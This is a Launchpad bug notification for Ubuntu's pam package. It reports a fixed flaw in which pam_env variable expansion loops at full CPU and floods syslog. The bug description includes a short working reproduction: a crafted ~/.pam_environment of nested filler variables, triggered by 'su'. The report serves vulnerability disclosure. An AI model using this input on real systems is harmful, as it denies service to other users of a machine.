[Bug 874565] Re: 100% CPU utilitization in pam_env parsing

[Marc Deslauriers]

** Visibility changed to: Public

** Visibility changed to: Public

-- 
You received this bug notification because you are a member of Ubuntu
Foundations Bugs, which is subscribed to pam in Ubuntu.
https://bugs.launchpad.net/bugs/874565

Title:
  100% CPU utilitization in pam_env parsing

Status in “pam” package in Ubuntu:
  Fix Released

Bug description:
  The pam_env variable expansion routine does not correctly abort under
  some situations when expending variable names. This triggers 100% CPU
  use and syslog flooding.

  To reproduce:

  cat <<EOM >~/.pam_environment

  EVIL_FILLER_255 DEFAULT=BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
  EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
  EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
  EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
  EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
  EOM

  This will trigger CPU usage for whatever process runs the PAM stack.
  For example, to make root run away, run "su - $USER" and correctly
  authenticate.

To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/pam/+bug/874565/+subscriptions